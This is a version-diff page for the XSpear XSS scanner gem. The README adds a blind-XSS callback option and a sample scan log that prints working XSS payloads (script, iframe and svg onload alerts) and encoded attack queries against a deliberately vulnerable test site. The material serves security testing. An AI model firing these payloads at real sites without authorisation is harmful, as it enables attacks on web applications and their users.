RubyGems - XSpear - Versions diffs - 1.0.5 → 1.0.6 - Mend

XSpear 1.0.5 → 1.0.6

Files changed (8) hide show

checksums.yaml CHANGED Viewed

@@ -1,7 +1,7 @@
 ---
 SHA256:
-  metadata.gz: b09dcb74e1734799658762e143a9faf16db70df6200de80ca2334cdbfc8c5d08
-  data.tar.gz: dd840605d1fd1261b672f5bf27de9f648a924abeb685f6bea2334a4f2f3f3cc1
+  metadata.gz: 79c560a49f42b36d468188a502f3b8c16f78b2b0c8a11af550deeb083978529e
+  data.tar.gz: d64291c47fddcee3d326ad2cb1db999c52fd992e3baf954b1b6fcdd47137f773
 SHA512:
-  metadata.gz: c29c155ff0ab0667c2ff4deab4618eaace8dae3410e159b141187f1cd13040679b6f84597ff250fe3e99ee740e8676dbaeccc7df405f6ccf19026441f9a928cb
-  data.tar.gz: 568f793d58fa31180fa494aefa54557b2e927ee3c240a5fb789502bd1c43730c24f22849eb2ac6110daccb97a882f845a69b1aea723848b3561eb46a9e03d7af
+  metadata.gz: 3af5242c09f427957569d96ab94f239f774471594d127e4f33ca3c92db2ef1787cf59adbad739c18944340635dbe6f3b5cb10261d2d9e144379505e5356a85b5
+  data.tar.gz: 4b2d8e9715b15fe2637d20655837e084d59dafbda2472ecc31a135dd8d3ee3469742c8d81cd8c372c323038d5ec07d70dafca7fb3bf2f5da4b1e758513e13256

data/.github/FUNDING.yml ADDED Viewed

@@ -0,0 +1,12 @@
+# These are supported funding model platforms
+github: #hahwul
+patreon: # Replace with a single Patreon username
+open_collective: # Replace with a single Open Collective username
+ko_fi: # Replace with a single Ko-fi username
+tidelift: # Replace with a single Tidelift platform-name/package-name e.g., npm/babel
+community_bridge: # Replace with a single Community Bridge project-name e.g., cloud-foundry
+liberapay: # Replace with a single Liberapay username
+issuehunt: # Replace with a single IssueHunt username
+otechie: # Replace with a single Otechie username
+custom: ['https://www.paypal.me/hahwul']

data/.idea/workspace.xml CHANGED Viewed

@@ -3,10 +3,7 @@
   <component name="ChangeListManager">
     <list default="true" id="4ee2e581-45d7-4c90-b6a1-e92e4b5829dd" name="Default Changelist" comment="">
       <change beforePath="$PROJECT_DIR$/.idea/workspace.xml" beforeDir="false" afterPath="$PROJECT_DIR$/.idea/workspace.xml" afterDir="false" />
-      <change beforePath="$PROJECT_DIR$/exe/XSpear" beforeDir="false" afterPath="$PROJECT_DIR$/exe/XSpear" afterDir="false" />
       <change beforePath="$PROJECT_DIR$/lib/XSpear.rb" beforeDir="false" afterPath="$PROJECT_DIR$/lib/XSpear.rb" afterDir="false" />
-      <change beforePath="$PROJECT_DIR$/lib/XSpear/XSpearRepoter.rb" beforeDir="false" afterPath="$PROJECT_DIR$/lib/XSpear/XSpearRepoter.rb" afterDir="false" />
-      <change beforePath="$PROJECT_DIR$/lib/XSpear/version.rb" beforeDir="false" afterPath="$PROJECT_DIR$/lib/XSpear/version.rb" afterDir="false" />
     </list>
     <option name="EXCLUDED_CONVERTED_TO_IGNORED" value="true" />
     <option name="SHOW_DIALOG" value="false" />
@@ -22,7 +19,7 @@
       <file pinned="false" current-in-tab="false">
         <entry file="file://$PROJECT_DIR$/exe/XSpear">
           <provider selected="true" editor-type-id="text-editor">
-            <state relative-caret-position="496">
+            <state relative-caret-position="525">
               <caret line="35" column="117" selection-start-line="35" selection-start-column="117" selection-end-line="35" selection-end-column="117" />
             </state>
           </provider>
@@ -32,19 +29,19 @@
         <entry file="file://$PROJECT_DIR$/README.md">
           <provider selected="true" editor-type-id="split-provider[text-editor;markdown-preview-editor]">
             <state split_layout="SPLIT">
-              <first_editor relative-caret-position="45">
-                <caret line="3" column="132" selection-start-line="3" selection-start-column="132" selection-end-line="3" selection-end-column="132" />
+              <first_editor relative-caret-position="599">
+                <caret line="268" column="110" selection-start-line="268" selection-start-column="110" selection-end-line="268" selection-end-column="110" />
               </first_editor>
               <second_editor />
             </state>
           </provider>
         </entry>
       </file>
-      <file pinned="false" current-in-tab="false">
+      <file pinned="false" current-in-tab="true">
         <entry file="file://$PROJECT_DIR$/lib/XSpear.rb">
           <provider selected="true" editor-type-id="text-editor">
-            <state relative-caret-position="528">
-              <caret line="309" column="94" lean-forward="true" selection-start-line="309" selection-start-column="94" selection-end-line="309" selection-end-column="94" />
+            <state relative-caret-position="370">
+              <caret line="376" lean-forward="true" selection-start-line="376" selection-end-line="376" />
             </state>
           </provider>
         </entry>
@@ -52,8 +49,8 @@
       <file pinned="false" current-in-tab="false">
         <entry file="file://$PROJECT_DIR$/lib/XSpear/XSpearRepoter.rb">
           <provider selected="true" editor-type-id="text-editor">
-            <state relative-caret-position="586">
-              <caret line="107" column="36" lean-forward="true" selection-start-line="107" selection-start-column="36" selection-end-line="107" selection-end-column="36" />
+            <state relative-caret-position="392">
+              <caret line="102" column="9" lean-forward="true" selection-start-line="102" selection-start-column="9" selection-end-line="102" selection-end-column="9" />
             </state>
           </provider>
         </entry>
@@ -71,12 +68,12 @@
         <entry file="file://$PROJECT_DIR$/lib/XSpear/log.rb">
           <provider selected="true" editor-type-id="text-editor">
             <state relative-caret-position="195">
-              <caret line="13" column="19" lean-forward="true" selection-start-line="13" selection-start-column="19" selection-end-line="13" selection-end-column="19" />
+              <caret line="13" column="19" selection-start-line="13" selection-start-column="19" selection-end-line="13" selection-end-column="19" />
             </state>
           </provider>
         </entry>
       </file>
-      <file pinned="false" current-in-tab="true">
+      <file pinned="false" current-in-tab="false">
         <entry file="file://$PROJECT_DIR$/lib/XSpear/version.rb">
           <provider selected="true" editor-type-id="text-editor">
             <state relative-caret-position="15">
@@ -114,12 +111,12 @@
       <list>
         <option value="$PROJECT_DIR$/lib/XSpear/log.rb" />
         <option value="$PROJECT_DIR$/XSpear.gemspec" />
-        <option value="$PROJECT_DIR$/README.md" />
         <option value="$PROJECT_DIR$/lib/XSpear/banner.rb" />
         <option value="$PROJECT_DIR$/exe/XSpear" />
+        <option value="$PROJECT_DIR$/lib/XSpear/version.rb" />
+        <option value="$PROJECT_DIR$/README.md" />
         <option value="$PROJECT_DIR$/lib/XSpear/XSpearRepoter.rb" />
         <option value="$PROJECT_DIR$/lib/XSpear.rb" />
-        <option value="$PROJECT_DIR$/lib/XSpear/version.rb" />
       </list>
     </option>
   </component>
@@ -137,6 +134,7 @@
       <foldersAlwaysOnTop value="true" />
     </navigator>
     <panes>
+      <pane id="Scope" />
       <pane id="ProjectPane">
         <subPane>
           <expand>
@@ -174,7 +172,6 @@
           <select />
         </subPane>
       </pane>
-      <pane id="Scope" />
     </panes>
   </component>
   <component name="PropertiesComponent">
@@ -233,7 +230,8 @@
       <updated>1562942814778</updated>
       <workItem from="1562942816004" duration="15337000" />
       <workItem from="1563638656518" duration="4985000" />
-      <workItem from="1563809961097" duration="3592000" />
+      <workItem from="1563809961097" duration="4237000" />
+      <workItem from="1563893538891" duration="2230000" />
     </task>
     <task id="LOCAL-00001" summary="init update">
       <created>1562945899597</created>
@@ -424,17 +422,73 @@
       <option name="project" value="LOCAL" />
       <updated>1563649975625</updated>
     </task>
-    <option name="localTasksCounter" value="28" />
+    <task id="LOCAL-00028" summary="(1.0.5) Add blind XSS options &amp; edit &quot;filtered Rule testing code&quot;">
+      <created>1563813695850</created>
+      <option name="number" value="00028" />
+      <option name="presentableId" value="LOCAL-00028" />
+      <option name="project" value="LOCAL" />
+      <updated>1563813695850</updated>
+    </task>
+    <task id="LOCAL-00029" summary="(1.0.5) Update README.md">
+      <created>1563814201784</created>
+      <option name="number" value="00029" />
+      <option name="presentableId" value="LOCAL-00029" />
+      <option name="project" value="LOCAL" />
+      <updated>1563814201784</updated>
+    </task>
+    <task id="LOCAL-00030" summary="(1.0.6)[fixed #6] Edit Static Analysis code">
+      <created>1563893769120</created>
+      <option name="number" value="00030" />
+      <option name="presentableId" value="LOCAL-00030" />
+      <option name="project" value="LOCAL" />
+      <updated>1563893769120</updated>
+    </task>
+    <task id="LOCAL-00031" summary="(1.0.6)[fixed #7] CallbackNotAdded 쪽 분기문 수정">
+      <created>1563893901111</created>
+      <option name="number" value="00031" />
+      <option name="presentableId" value="LOCAL-00031" />
+      <option name="project" value="LOCAL" />
+      <updated>1563893901111</updated>
+    </task>
+    <task id="LOCAL-00032" summary="(1.0.6)[fixed #4] Report 객체 수정">
+      <created>1563894048747</created>
+      <option name="number" value="00032" />
+      <option name="presentableId" value="LOCAL-00032" />
+      <option name="project" value="LOCAL" />
+      <updated>1563894048747</updated>
+    </task>
+    <task id="LOCAL-00033" summary="(1.0.6)[fixed #8] Added response header analysis module">
+      <created>1563894186608</created>
+      <option name="number" value="00033" />
+      <option name="presentableId" value="LOCAL-00033" />
+      <option name="project" value="LOCAL" />
+      <updated>1563894186608</updated>
+    </task>
+    <task id="LOCAL-00034" summary="(1.0.6)[fixed #9] Added method in report-cli">
+      <created>1563894430592</created>
+      <option name="number" value="00034" />
+      <option name="presentableId" value="LOCAL-00034" />
+      <option name="project" value="LOCAL" />
+      <updated>1563894430592</updated>
+    </task>
+    <task id="LOCAL-00035" summary="(1.0.6) Edit report &amp; scanning format">
+      <created>1563895638242</created>
+      <option name="number" value="00035" />
+      <option name="presentableId" value="LOCAL-00035" />
+      <option name="project" value="LOCAL" />
+      <updated>1563895638242</updated>
+    </task>
+    <option name="localTasksCounter" value="36" />
     <servers />
   </component>
   <component name="TimeTrackingManager">
-    <option name="totallyTimeSpent" value="23914000" />
+    <option name="totallyTimeSpent" value="26789000" />
   </component>
   <component name="ToolWindowManager">
-    <frame x="-1920" y="-620" width="1920" height="1057" extended-state="6" />
+    <frame x="-1920" y="-620" width="1920" height="1057" extended-state="0" />
     <editor active="true" />
     <layout>
-      <window_info active="true" content_ui="combo" id="Project" order="0" visible="true" weight="0.16240682" />
+      <window_info active="true" content_ui="combo" id="Project" order="0" visible="true" weight="0.16400427" />
       <window_info id="Structure" order="1" side_tool="true" weight="0.25" />
       <window_info id="Favorites" order="2" side_tool="true" />
       <window_info anchor="bottom" id="Message" order="0" />
@@ -477,7 +531,15 @@
     <MESSAGE value="Edit version , release 1.0.2" />
     <MESSAGE value="Add EventHandler Test logic (1.0.3), edit description on report" />
     <MESSAGE value="verbose가 1일 떄 배너 출력되지 않도록 수정" />
-    <option name="LAST_COMMIT_MESSAGE" value="verbose가 1일 떄 배너 출력되지 않도록 수정" />
+    <MESSAGE value="(1.0.5) Add blind XSS options &amp; edit &quot;filtered Rule testing code&quot;" />
+    <MESSAGE value="(1.0.5) Update README.md" />
+    <MESSAGE value="(1.0.6)[fixed #6] Edit Static Analysis code" />
+    <MESSAGE value="(1.0.6)[fixed #7] CallbackNotAdded 쪽 분기문 수정" />
+    <MESSAGE value="(1.0.6)[fixed #4] Report 객체 수정" />
+    <MESSAGE value="(1.0.6)[fixed #8] Added response header analysis module" />
+    <MESSAGE value="(1.0.6)[fixed #9] Added method in report-cli" />
+    <MESSAGE value="(1.0.6) Edit report &amp; scanning format" />
+    <option name="LAST_COMMIT_MESSAGE" value="(1.0.6) Edit report &amp; scanning format" />
   </component>
   <component name="editorHistoryManager">
     <entry file="file://$USER_HOME$/.rvm/gems/ruby-2.4.6/gems/bundler-2.0.1/lib/bundler/rubygems_integration.rb">
@@ -493,13 +555,10 @@
     <entry file="file://$PROJECT_DIR$/bin/setup">
       <provider selected="true" editor-type-id="text-editor" />
     </entry>
-    <entry file="file://$PROJECT_DIR$/README.md">
-      <provider selected="true" editor-type-id="split-provider[text-editor;markdown-preview-editor]">
-        <state split_layout="SPLIT">
-          <first_editor relative-caret-position="45">
-            <caret line="3" column="132" selection-start-line="3" selection-start-column="132" selection-end-line="3" selection-end-column="132" />
-          </first_editor>
-          <second_editor />
+    <entry file="file://$PROJECT_DIR$/exe/XSpear">
+      <provider selected="true" editor-type-id="text-editor">
+        <state relative-caret-position="525">
+          <caret line="35" column="117" selection-start-line="35" selection-start-column="117" selection-end-line="35" selection-end-column="117" />
         </state>
       </provider>
     </entry>
@@ -510,51 +569,54 @@
         </state>
       </provider>
     </entry>
-    <entry file="file://$PROJECT_DIR$/Rakefile">
-      <provider selected="true" editor-type-id="text-editor" />
-    </entry>
-    <entry file="file:///usr/local/bin/rake">
-      <provider selected="true" editor-type-id="text-editor" />
-    </entry>
-    <entry file="file://$PROJECT_DIR$/exe/XSpear">
+    <entry file="file://$PROJECT_DIR$/lib/XSpear/log.rb">
       <provider selected="true" editor-type-id="text-editor">
-        <state relative-caret-position="496">
-          <caret line="35" column="117" selection-start-line="35" selection-start-column="117" selection-end-line="35" selection-end-column="117" />
+        <state relative-caret-position="195">
+          <caret line="13" column="19" selection-start-line="13" selection-start-column="19" selection-end-line="13" selection-end-column="19" />
         </state>
       </provider>
     </entry>
-    <entry file="file://$PROJECT_DIR$/lib/XSpear/log.rb">
+    <entry file="file://$PROJECT_DIR$/lib/XSpear/version.rb">
       <provider selected="true" editor-type-id="text-editor">
-        <state relative-caret-position="195">
-          <caret line="13" column="19" lean-forward="true" selection-start-line="13" selection-start-column="19" selection-end-line="13" selection-end-column="19" />
+        <state relative-caret-position="15">
+          <caret line="1" column="18" selection-start-line="1" selection-start-column="18" selection-end-line="1" selection-end-column="18" />
         </state>
       </provider>
     </entry>
-    <entry file="file://$PROJECT_DIR$/lib/XSpear/XSpearRepoter.rb">
+    <entry file="file://$PROJECT_DIR$/XSpear.gemspec">
       <provider selected="true" editor-type-id="text-editor">
-        <state relative-caret-position="586">
-          <caret line="107" column="36" lean-forward="true" selection-start-line="107" selection-start-column="36" selection-end-line="107" selection-end-column="36" />
+        <state relative-caret-position="105">
+          <caret line="7" column="23" selection-start-line="7" selection-start-column="23" selection-end-line="7" selection-end-column="38" />
         </state>
       </provider>
     </entry>
-    <entry file="file://$PROJECT_DIR$/lib/XSpear.rb">
-      <provider selected="true" editor-type-id="text-editor">
-        <state relative-caret-position="528">
-          <caret line="309" column="94" lean-forward="true" selection-start-line="309" selection-start-column="94" selection-end-line="309" selection-end-column="94" />
+    <entry file="file://$PROJECT_DIR$/Rakefile">
+      <provider selected="true" editor-type-id="text-editor" />
+    </entry>
+    <entry file="file:///usr/local/bin/rake">
+      <provider selected="true" editor-type-id="text-editor" />
+    </entry>
+    <entry file="file://$PROJECT_DIR$/README.md">
+      <provider selected="true" editor-type-id="split-provider[text-editor;markdown-preview-editor]">
+        <state split_layout="SPLIT">
+          <first_editor relative-caret-position="599">
+            <caret line="268" column="110" selection-start-line="268" selection-start-column="110" selection-end-line="268" selection-end-column="110" />
+          </first_editor>
+          <second_editor />
         </state>
       </provider>
     </entry>
-    <entry file="file://$PROJECT_DIR$/XSpear.gemspec">
+    <entry file="file://$PROJECT_DIR$/lib/XSpear/XSpearRepoter.rb">
       <provider selected="true" editor-type-id="text-editor">
-        <state relative-caret-position="105">
-          <caret line="7" column="23" selection-start-line="7" selection-start-column="23" selection-end-line="7" selection-end-column="38" />
+        <state relative-caret-position="392">
+          <caret line="102" column="9" lean-forward="true" selection-start-line="102" selection-start-column="9" selection-end-line="102" selection-end-column="9" />
         </state>
       </provider>
     </entry>
-    <entry file="file://$PROJECT_DIR$/lib/XSpear/version.rb">
+    <entry file="file://$PROJECT_DIR$/lib/XSpear.rb">
       <provider selected="true" editor-type-id="text-editor">
-        <state relative-caret-position="15">
-          <caret line="1" column="18" selection-start-line="1" selection-start-column="18" selection-end-line="1" selection-end-column="18" />
+        <state relative-caret-position="370">
+          <caret line="376" lean-forward="true" selection-start-line="376" selection-end-line="376" />
         </state>
       </provider>
     </entry>

data/README.md CHANGED Viewed

@@ -6,12 +6,16 @@ XSpear is XSS Scanner on ruby gems
 ## Key features
 - Pattern matching based XSS scanning
 - Detect `alert` `confirm` `prompt` event on headless browser (with Selenium)
-- Testing request/response for XSS protection bypass and reflected params
+- Testing request/response for XSS protection bypass and reflected params<br>
+  + Reflected Params
+  + Filtered test `event handler` `HTML tag` `Special Char`
+- Testing Blind XSS (with XSS Hunter , ezXSS, HBXSS, Etc all url base blind test...)
 - XSpear running on ruby code(with Gem library)
 - Dynamic/Static Analysis(Find SQL Error, etc..)
 - Show table base report and testing raw query(url)
 - Testing at selected parameters
 - Support output format `cli` `json`
+  + cli: summary, filtered rule(params), Raw Query
 - Support Verbose level (quit / nomal / raw data)
 - Support custom callback code to any test various attack vectors
@@ -58,6 +62,9 @@ $ ruby a.rb -u 'https://www.hahwul.com/?q=123' --cookie='role=admin'
         --headers=HEADERS            [optional] Add HTTP Headers
         --cookie=COOKIE              [optional] Add Cookie
     -p, --param=PARAM                [optional] Test paramters
+    -b, --BLIND=URL                  [optional] Add vector of Blind XSS
+                                      + with XSS Hunter, ezXSS, HBXSS, etc...
+                                      + e.g : -b https://hahwul.xss.ht
     -t, --threads=NUMBER             [optional] thread , default: 10
     -o, --output=FILENAME            [optional] Save JSON Result
     -v, --verbose=1~3                [optional] Show log depth
@@ -102,65 +109,70 @@ etc...
 ### Sample log
 **Scanning XSS**
 ```
-$ xspear -u "http://testphp.vulnweb.com/listproducts.php?cat=1"
-    )  (
- ( /(  )\ )
- )\())(()/(          (     )  (
-((_)\  /(_))`  )    ))\ ( /(  )(
-__((_)(_))  /(/(   /((_))(_))(()\
-\ \/ // __|((_)_\ (_)) ((_)_  ((_)
- >  < \__ \| '_ \)/ -_)/ _` || '_|
-/_/\_\|___/| .__/ \___|\__,_||_|    />
-           |_|                   \ /<
-{\\\\\\\\\\\\\BYHAHWUL\\\\\\\\\\\(0):::<======================-
-                                 / \<
-                                    \>
-[*] creating a test query.
-[*] test query generation is complete. [30 query]
-[*] starting test and analysis. [10 threads]
-[-] [01:24:38] not reflected XsPeaR`
-[-] [01:24:38] not reflected XsPeaR>
-[I] [01:24:38] reflected rEfe6[param: cat][reflected parameter]
-[-] [01:24:38] not reflected XsPeaR|
-[-] [01:24:38] not reflected XsPeaR'
-[I] [01:24:38] [param: cat][Found SQL Error Pattern]
-[-] [01:24:38] not reflected XsPeaR(
-[-] [01:24:38] not reflected <XsPeaR
-[-] [01:24:38] not reflected XsPeaR"
-[-] [01:24:38] not reflected XsPeaR;
-[-] [01:24:39] not reflected XsPeaR:
-[-] [01:24:39] not reflected XsPeaR[
-[-] [01:24:39] not reflected XsPeaR]
-[-] [01:24:39] not reflected XsPeaR}
-[-] [01:24:39] not reflected XsPeaR)
-[-] [01:24:39] not reflected XsPeaR{
-[-] [01:24:39] not reflected XsPeaR.
-[-] [01:24:39] not reflected XsPeaR-
-[-] [01:24:39] not reflected XsPeaR+
-[-] [01:24:39] not reflected XsPeaR,
-[I] [01:24:40] reflected XsPeaR$[param: cat][not filtered $]
-[-] [01:24:40] not reflected <svg/onload=alert(45)>
-[H] [01:24:40] reflected <script>alert(45)</script>[param: cat][reflected XSS Code]
-[-] [01:24:40] not reflected XsPeaR=
-[-] [01:24:40] not reflected <img/src onerror=alert(45)>
-[*] finish scan. the report is being generated..
-+----+------+------------------+-------+----------------------------+-------------------------+
-|                                      [ XSpear report ]                                      |
-|                      http://testphp.vulnweb.com/listproducts.php?cat=1                      |
-|            2019-07-20 01:24:38 +0900 ~ 2019-07-20 01:25:41 +0900 Found 4 issues.            |
-+----+------+------------------+-------+----------------------------+-------------------------+
-| NO | TYPE | ISSUE            | PARAM | PAYLOAD                    | DESCRIPTION             |
-+----+------+------------------+-------+----------------------------+-------------------------+
-| 0  | INFO | REFLECTED        | cat   | rEfe6                      | reflected parameter     |
-| 1  | INFO | DYNAMIC ANALYSIS | cat   | XsPeaR"                    | Found SQL Error Pattern |
-| 2  | INFO | FILERD RULE      | cat   | XsPeaR$                    | not filtered $          |
-| 3  | HIGH | XSS              | cat   | <script>alert(45)</script> | reflected XSS Code      |
-+----+------+------------------+-------+----------------------------+-------------------------+
-< Raw Query >
-[0] http://testphp.vulnweb.com/listproducts.php?cat=1?cat=1rEfe6
-[1] http://testphp.vulnweb.com/listproducts.php?cat=1?cat=1XsPeaR%22
-[2] http://testphp.vulnweb.com/listproducts.php?cat=1?cat=1XsPeaR%24
-[3] http://testphp.vulnweb.com/listproducts.php?cat=1?cat=1%22%3E%3Cscript%3Ealert%2845%29%3C%2Fscript%3E
+$ xspear -u "http://testphp.vulnweb.com/listproducts.php?cat=z"
+      )  (
+   ( /(  )\ )
+   )\())(()/(          (     )  (
+  ((_)\  /(_))`  )    ))\ ( /(  )(
+  __((_)(_))  /(/(   /((_))(_))(()\
+  \ \/ // __|((_)_\ (_)) ((_)_  ((_)
+   >  < \__ \| '_ \)/ -_)/ _` || '_|
+  /_/\_\|___/| .__/ \___|\__,_||_|    />
+             |_|                   \ /<
+  {\\\\\\\\\\\\\BYHAHWUL\\\\\\\\\\\(0):::<======================-
+                                   / \<
+                                      \>       [ v1.0.5 ]
+  [*] creating a test query.
+  [*] test query generation is complete. [138 query]
+  [*] starting test and analysis. [10 threads]
+  [I] [01:44:06] [param: cat][Found SQL Error Pattern]
+  [I] [01:44:06] reflected rEfe6[param: cat][reflected parameter]
+  [I] [01:44:08] reflected onhwul=64[param: cat][not filtered event handler on{any} pattern]
+  [-] [01:44:14] not reflected <svg/onload=alert(45)>
+  [H] [01:44:14] reflected <script>alert(45)</script>[param: cat][reflected XSS Code]
+  [H] [01:44:15] reflected "><iframe/src=JavaScriPt:alert(45)>[param: cat][reflected XSS Code]
+  [-] [01:44:15] not reflected <img/src onerror=alert(45)>
+  [-] [01:44:20] not found alert/prompt/confirm event '"><svg/onload=alert(45)>
+                 =>
+  [-] [01:44:21] not found alert/prompt/confirm event <xmp><p title="</xmp><svg/onload=alert(45)>">
+                 =>
+  [V] [01:44:21] found alert/prompt/confirm (45) in selenium!! <script>alert(45)</script>
+                 => [param: cat][triggered <script>alert(45)</script>]
+  [-] [01:44:22] not found alert/prompt/confirm event '"><svg/onload=alert(45)>
+                 =>
+  [V] [01:44:22] found alert/prompt/confirm (45) in selenium!! '"><svg/onload=alert(45)>
+                 => [param: cat][triggered <svg/onload=alert(45)>]
+  [-] [01:44:23] not found alert/prompt/confirm event '"><svg/onload=alert(45)>
+                 =>
+  [*] finish scan. the report is being generated..
+  +----+------+------------------+-------+-------------------------------------+--------------------------------------------+
+  |                                                    [ XSpear report ]                                                    |
+  |                                    http://testphp.vulnweb.com/listproducts.php?cat=z                                    |
+  |                          2019-07-23 01:44:05 +0900 ~ 2019-07-23 01:44:23 +0900 Found 7 issues.                          |
+  +----+------+------------------+-------+-------------------------------------+--------------------------------------------+
+  | NO | TYPE | ISSUE            | PARAM | PAYLOAD                             | DESCRIPTION                                |
+  +----+------+------------------+-------+-------------------------------------+--------------------------------------------+
+  | 0  | INFO | DYNAMIC ANALYSIS | cat   | XsPeaR"                             | Found SQL Error Pattern                    |
+  | 1  | INFO | REFLECTED        | cat   | rEfe6                               | reflected parameter                        |
+  | 2  | INFO | FILERD RULE      | cat   | onhwul=64                           | not filtered event handler on{any} pattern |
+  | 3  | HIGH | XSS              | cat   | <script>alert(45)</script>          | reflected XSS Code                         |
+  | 4  | HIGH | XSS              | cat   | "><iframe/src=JavaScriPt:alert(45)> | reflected XSS Code                         |
+  | 5  | VULN | XSS              | cat   | <script>alert(45)</script>          | triggered <script>alert(45)</script>       |
+  | 6  | VULN | XSS              | cat   | '"><svg/onload=alert(45)>           | triggered <svg/onload=alert(45)>           |
+  +----+------+------------------+-------+-------------------------------------+--------------------------------------------+
+  < Not Filtered >
+  [cat] param
+   + Special Char: `,\,<,|,(,;,>,',),+,-,{,.,],,,[,},:,=,$
+   + Event Handler: "onAfterUpdate","onAbort","onBeforeCut","onAfterPrint","onBeforeActivate","onActivate","onBeforeCopy","onBeforeUpdate","onBeforeEditFocus","onBeforeDeactivate","onBlur","onBounce","onCellChange","onBegin","onBeforePrint","onBeforeUnload","onBeforePaste","onCut","onContextMenu","onCopy","onDataSetComplete","onClick","onDblClick","onControlSelect","onDataSetChanged","onChange","onDataAvailable","onDragEnd","onDragOver","onDrag","onDragLeave","onDragStart","onDeactivate","onDragEnter","onDragDrop","onDrop","onEnd","onFinish","onHashChange","onFocusIn","onErrorUpdate","onHelp","onFocusOut","onInput","onFocus","onError","onFilterChange","onMouseDown","onKeyPress","onMediaComplete","onLayoutComplete","onMediaError","onKeyUp","onMessage","onKeyDown","onLoad","onLoseCapture","onMouseEnter","onMouseUp","onMouseLeave","onMove","onMoveEnd","onMoveStart","onMouseOver","onMouseMove","onMouseOut","onMouseWheel","onProgress","onOutOfSync","onPopState","onPropertyChange","onOffline","onOnline","onRedo","onPaste","onReadyStateChange","onPause","onResizeStart","onRowExit","onResume","onRowDelete","onRepeat","onReset","onResizeEnd","onReverse","onRowsEnter","onResize","onSelectionChange","onSyncRestored","onStart","onStop","onStorage","onRowInserted","onSelect","onSelectStart","onScroll","onSeek","onTrackChange","onUnload","onURLFlip","onSubmit","onTimeError","onUndo"
+   + HTML Tag: "script","iframe"
+  < Raw Query >
+  [0] http://testphp.vulnweb.com/listproducts.php?cat=z?cat=zXsPeaR%22
+  [1] http://testphp.vulnweb.com/listproducts.php?cat=z?cat=zrEfe6
+  [2] http://testphp.vulnweb.com/listproducts.php?cat=z?cat=z%5C%22%3E%3Cxspear+onhwul%3D64%3E
+  [3] http://testphp.vulnweb.com/listproducts.php?cat=z?cat=z%22%3E%3Cscript%3Ealert%2845%29%3C%2Fscript%3E
+  [4] http://testphp.vulnweb.com/listproducts.php?cat=z?cat=z%22%3E%3Ciframe%2Fsrc%3DJavaScriPt%3Aalert%2845%29%3E
+  [5] http://testphp.vulnweb.com/listproducts.php?cat=z?cat=z%22%3E%3Cscript%3Ealert%2845%29%3C%2Fscript%3E
+  [6] http://testphp.vulnweb.com/listproducts.php?cat=z?cat=z%27%22%3E%3Csvg%2Fonload%3Dalert%2845%29%3E
 ```
 **to JSON**
@@ -173,8 +185,8 @@ $ xspear -u "http://testphp.vulnweb.com/search.php?test=query" -d "searchFor=yy"
 ```ruby
 require 'XSPear'
-s = XspearScan.new "https://www.hahwul.com?target_url", "post_body=thisisbodydata", "CustomHeader: wow", 3, 10, "result.json", "3"
-# s = XspearScan.new options.url, options.data, options.headers, options.level, options.thread.to_i, options.output, options.verbose
+s = XspearScan.new "https://www.hahwul.com?target_url", "post_body=thisisbodydata", "CustomHeader: wow", 3, 10, "result.json", "3", "blind-xss-url"
+# s = XspearScan.new options.url, options.data, options.headers, options.level, options.thread.to_i, options.output, options.verbose, options.blind
 s.run
 ```
@@ -254,5 +266,5 @@ The gem is available as open source under the terms of the [MIT License](https:/
 Everyone interacting in the XSpear project’s codebases, issue trackers, chat rooms and mailing lists is expected to follow the [code of conduct](https://github.com/[USERNAME]/XSpear/blob/master/CODE_OF_CONDUCT.md).
 ## ScreenShot
-<img src="https://user-images.githubusercontent.com/13212227/61582619-ed233700-ab67-11e9-94f7-33cb6af5997c.png" width=100%>
+<img src="https://user-images.githubusercontent.com/13212227/61649243-14a30c80-acec-11e9-9a20-73839c4ec580.png" width=100%>
 <img src="https://user-images.githubusercontent.com/13212227/61311071-8b459300-a830-11e9-8e60-c08e984fdacb.png" width=100%>

data/lib/XSpear/XSpearRepoter.rb CHANGED Viewed

@@ -13,13 +13,14 @@ class IssueStruct
 end
 class XspearRepoter
-  def initialize(url,starttime)
+  def initialize(url,starttime, method)
     @url = url
     @starttime = starttime
     @endtime = nil
     @issue = []
     @query = []
     @filtered_objects = {}
+    @method = method
     # type : i,v,l,m,h
     # param : paramter
     # type :
@@ -33,14 +34,14 @@ class XspearRepoter
   def add_issue_first(type, issue, param, payload, pattern, description)
     rtype = {"i"=>"INFO","v"=>"VULN","l"=>"LOW","m"=>"MIDUM","h"=>"HIGH"}
     rissue = {"f"=>"FILERD RULE","r"=>"REFLECTED","x"=>"XSS","s"=>"STATIC ANALYSIS","d"=>"DYNAMIC ANALYSIS"}
-    @issue.insert(0,["-", rtype[type], rissue[issue], param, pattern, description])
+    @issue.insert(0,["-", rtype[type], rissue[issue], @method, param, pattern, description])
     @query.push payload
   end
   def add_issue(type, issue, param, payload, pattern, description)
     rtype = {"i"=>"INFO","v"=>"VULN","l"=>"LOW","m"=>"MIDUM","h"=>"HIGH"}
     rissue = {"f"=>"FILERD RULE","r"=>"REFLECTED","x"=>"XSS","s"=>"STATIC ANALYSIS","d"=>"DYNAMIC ANALYSIS"}
-    @issue << [@issue.size, rtype[type], rissue[issue], param, pattern, description]
+    @issue << [@issue.size, rtype[type], rissue[issue], @method, param, pattern, description]
     @query.push payload
   end
@@ -77,11 +78,11 @@ class XspearRepoter
     end
     table = Terminal::Table.new
     table.title = "[ XSpear report ]".red+"\n#{rurl}\n#{@starttime} ~ #{@endtime} Found #{@issue.length} issues."
-    table.headings = ['NO','TYPE','ISSUE','PARAM','PAYLOAD','DESCRIPTION']
+    table.headings = ['NO','TYPE','ISSUE', 'METHOD', 'PARAM', 'PAYLOAD','DESCRIPTION']
     table.rows = @issue
     #table.style = {:width => 80}
     puts table
-    puts "< Not Filtered >".yellow
+    puts "< Available Objects >".yellow
     @filtered_objects.each do |key, value|
       eh = []
       tag = []
@@ -100,9 +101,9 @@ class XspearRepoter
           sc.push n.sub("XsPeaR","")
         end
       end
-      puts " + Special Char: ".green+"#{sc.map(&:inspect).join(',').gsub('"',"")}"
-      puts " + Event Handler: ".green+"#{eh.map(&:inspect).join(',')}"
-      puts " + HTML Tag: ".green+"#{tag.map(&:inspect).join(',')}"
+      puts " + Available Special Char: ".green+"#{sc.map(&:inspect).join(',').gsub('"',"")}".gsub(',',' ')
+      puts " + Available Event Handler: ".green+"#{eh.map(&:inspect).join(',')}"
+      puts " + Available HTML Tag: ".green+"#{tag.map(&:inspect).join(',')}"
     end
     puts "< Raw Query >".yellow
     @query.each_with_index do |q, i|

data/lib/XSpear/version.rb CHANGED Viewed

@@ -1,3 +1,3 @@
 module XSpear
